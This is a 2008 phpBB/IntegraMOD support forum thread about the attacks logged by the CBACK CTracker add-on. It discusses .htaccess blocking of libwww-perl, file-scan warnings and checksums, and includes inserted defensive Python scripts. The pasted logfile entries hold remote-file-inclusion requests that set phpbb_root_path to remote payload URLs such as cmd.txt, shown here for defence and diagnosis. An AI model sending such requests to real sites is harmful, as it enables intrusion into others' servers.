CBACK Attacks

Support for IntegraMOD 141

Moderator: Integra Moderator

CBACK Attacks

PostAuthor: BrianC » Tue Feb 05, 2008 4:01 pm

Your phpBB Version: 2.0.
phpBB Type: Standard phpBB
MODs: No
Your knowledge: Beginner

Description and Message

Hi,

I installed a new install of the latest IntegraMOD 141 after being hacked badly a few times. CBACK indicates that it has blocked 125 attacks in just a couple of days. What are the attacks that are likely being blocked? Perhaps automated scans, or maybe someone attacking the site again?

Any ideas?

Thanks,
Brian

Re: CBACK Attacks

PostAuthor: Helter » Tue Feb 05, 2008 4:20 pm

Go to acp/CTracker/Logfile Manager/

Re: CBACK Attacks

PostAuthor: CaNNon » Tue Feb 05, 2008 5:41 pm

"Perhaps automated scans"

Those show up in phpBB security as DDoS attacks.

"someone attacking the site again."

Yeah, attacking or trying to get spam in.

One .htaccess rule should cut that a lot. Look at what is happening with this user agent, libwww-perl. If you would like to block it, add this to your .htaccess file.

Code:
# [OR] joins this condition to the RewriteCond that follows it, so it belongs inside a RewriteCond block that ends in a RewriteRule
RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]

PostAuthor: spaniel » Tue Feb 05, 2008 10:37 pm

When you do a filescan in CTracker and it tells you:

"Code in the file is possibly executable from beyond phpBB"

does that mean those files are unsafe, and how can you stop them being executable from beyond phpBB?

And of my admin_security.php file, it said:

"An undefined case occurred during scanning"

Should I be worried?

Thanks.

Re: CBACK Attacks

PostAuthor: CaNNon » Wed Feb 06, 2008 12:49 am

No worries. The first one you would use, like, to check if updates have made your forum more secure. Not all files can be coded "not to be possibly executable from beyond phpBB" in cases you need to do this.

The second one, just don't worry about; I think it's more the scan/scan order than the file.

Now the other included scanner is much better... as you can create checksums.
So after you work on your site, make fresh checksums, and if you think you may have had a guest, you can verify if there have been any changes to the code by the checksum. Also, it shows you what file you need to go check!

A nice little tool and I have much faith in it.
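The baseline-and-verify workflow described in the post above, as an added Python example (not CTracker's scanner and not code from the thread): it records SHA-256 checksums for the forum's PHP files and `.htaccess`, then reports which files were modified, added or removed. The file patterns and the JSON manifest format are assumptions.

```python
import hashlib
import json
from pathlib import Path


def build_manifest(root, patterns=("*.php", ".htaccess")):
    """Map each matching file (path relative to root) to its SHA-256 digest."""
    root = Path(root)
    manifest = {}
    for pattern in patterns:
        for path in root.rglob(pattern):
            if path.is_file():
                digest = hashlib.sha256(path.read_bytes()).hexdigest()
                manifest[path.relative_to(root).as_posix()] = digest
    return manifest


def save_manifest(manifest, out_file):
    """Store the baseline; keep it outside the web root so it cannot be edited with the site."""
    Path(out_file).write_text(json.dumps(manifest, indent=1, sort_keys=True))


def compare(baseline, current):
    """Return the files to go and check, grouped by what happened to them."""
    return {
        "modified": sorted(f for f in baseline if f in current and baseline[f] != current[f]),
        "added": sorted(f for f in current if f not in baseline),
        "removed": sorted(f for f in baseline if f not in current),
    }


def verify(root, baseline_file):
    """Re-hash the tree and diff it against the stored baseline."""
    baseline = json.loads(Path(baseline_file).read_text())
    return compare(baseline, build_manifest(root))


if __name__ == "__main__":
    import sys
    # usage: script.py baseline|verify <forum_root> <manifest.json>
    mode, forum_root, manifest_file = sys.argv[1:4]
    if mode == "baseline":
        save_manifest(build_manifest(forum_root), manifest_file)
    else:
        for kind, files in verify(forum_root, manifest_file).items():
            for name in files:
                print(f"{kind}: {name}")
```

The "added" list matters as much as "modified": a file that was not in the baseline is one nobody on the team put there.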

PostAuthor: spaniel » Wed Feb 06, 2008 1:09 am

That sounds ingenious! Wow! It even tells you which file to check.

I'll be doing that from now on - thanks once again CaNNon

Re: CBACK Attacks

PostAuthor: CaNNon » Wed Feb 06, 2008 8:49 am

No problem.

Re: CBACK Attacks

PostAuthor: BrianC » Wed Feb 06, 2008 5:54 pm

Thanks for the help!!
This is some of the info in my logfile, and I have added the info indicated to my .htaccess.
I added it to the .htaccess in my root folder because that is where my forum is located.
Does that sound right?
6 Feb 2008 05:02 pm /group/portal.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt?? libwww-perl/5.808 65.98.55.154
2 06 Feb 2008 03:53 pm /group/portal.php?page=7&lofi=1//includes/functions_portal.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? libwww-perl/5.803 89.97.0.11
3 06 Feb 2008 03:16 pm /group/portal.php?phpbb_root_path=http://www.arabx1st.xpgplus.com.br/cmd.txt? libwww-perl/5.808 74.53.114.5
4 06 Feb 2008 03:13 pm /group/portal.php?phpbb_root_path=http://www.arabx1st.xpgplus.com.br/cmd.txt?? libwww-perl/5.808 74.53.114.5
5 06 Feb 2008 02:52 pm /group/portal.php?phpbb_root_path=http://test.iearn.uz/test.iearn.uz/help.txt???? libwww-perl/5.69 80.128.102.224
6 06 Feb 2008 02:40 pm /group/portal.php?phpbb_root_path=http://test.iearn.uz/test.iearn.uz/help.txt???? libwww-perl/5.803 213.83.63.218
7 06 Feb 2008 02:40 pm /group/portal.php?phpbb_root_path=http://test.iearn.uz/test.iearn.uz/help.txt??? libwww-perl/5.803 62.75.202.173
8 06 Feb 2008 01:44 pm /group/portal.php?page=7&lofi=1//includes/functions_portal.php?phpbb_root_path=http://217.126.22.22/.../myss.txt?? libwww-perl/5.805 64.81.203.10
9 06 Feb 2008 01:41 pm /group/portal.php?page=7&lofi=1//includes/functions_portal.php?phpbb_root_path=http://217.126.22.22/.../myss.txt?? libwww-perl/5.79 66.246.220.39
10 06 Feb 2008 01:32 pm /group/portal.php?page=7&lofi=1//includes/functions_portal.php?phpbb_root_path=http://66.153.86.221/www??????????????????????????????????? libwww-perl/5.805 75.0.18.81
11 06 Feb 2008 01:21 pm /group/portal.php?phpbb_root_path=http://217.126.22.22/.../myss.txt?? libwww-perl/5.805 64.81.203.10
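Added example, not part of the original thread: the logfile entries above all carry a remote URL in `phpbb_root_path`, so this Python check flags that pattern in entries of the same layout and notes whether the libwww-perl User-Agent rule would have covered each one. The sample lines, hostnames and addresses are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample in the layout of the logfile entries quoted above:
# index, date, time, request URI, user agent, client IP.
SAMPLE_LOG = """\
1 06 Feb 2008 05:02 pm /group/portal.php?phpbb_root_path=http://files.example.invalid/load.txt?? libwww-perl/5.808 192.0.2.10
2 06 Feb 2008 03:53 pm /group/portal.php?page=7&lofi=1//includes/functions_portal.php?phpbb_root_path=http://files.example.invalid/id.txt? libwww-perl/5.803 198.51.100.7
3 06 Feb 2008 03:16 pm /group/portal.php?phpbb_root_path=http%3A%2F%2Ffiles.example.invalid/cmd.txt? Mozilla/4.0 (compatible; MSIE 6.0) 203.0.113.5
4 06 Feb 2008 02:40 pm /group/viewtopic.php?t=42 Mozilla/5.0 (X11; Linux) 192.0.2.44
"""

LINE_RE = re.compile(
    r"^(?:(?P<idx>\d+)\s+)?(?P<when>\d{1,2} \w{3} \d{4} \d{2}:\d{2} [ap]m)\s+"
    r"(?P<uri>\S+)\s+(?P<agent>.*?)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$"
)
# A request parameter whose value starts with a remote URL scheme.
REMOTE_PARAM_RE = re.compile(r"([A-Za-z0-9_\[\]]+)=(?:https?|ftp)://", re.I)

def parse_line(line):
    """Split one logfile entry into its fields; None if the layout does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None

def remote_include_param(uri):
    """Return the name of the first parameter carrying a remote URL, else None."""
    decoded = unquote(unquote(uri))  # undo single and double percent-encoding
    m = REMOTE_PARAM_RE.search(decoded)
    return m.group(1) if m else None

def triage(log_text, blocked_agent="libwww-perl"):
    """Flag remote-include attempts and note which ones a User-Agent rule covers."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        param = remote_include_param(entry["uri"])
        if param:
            entry["param"] = param
            entry["ua_rule_covers"] = blocked_agent in entry["agent"].lower()
            findings.append(entry)
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        note = "covered by UA rule" if f["ua_rule_covers"] else "NOT covered by UA rule"
        print(f'{f["when"]}  {f["ip"]:<15} {f["param"]}  ({note})')
```

Matching on the parameter value rather than the client string keeps the check working for entries like the third sample line, which a User-Agent rule alone does not cover.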

Re: CBACK Attacks

PostAuthor: BrianC » Wed Feb 06, 2008 8:02 pm

Who is in non-compliance, spaniel?

I installed the latest IntegraMOD and neither added nor removed anything except some header images.

Re: CBACK Attacks

PostAuthor: CaNNon » Wed Feb 06, 2008 10:48 pm

Yeah, the worst I've had is 600 hits from libwww-perl in one night, Brian. I have yet to see it do anything but attack. Best to save the resources and just ban it.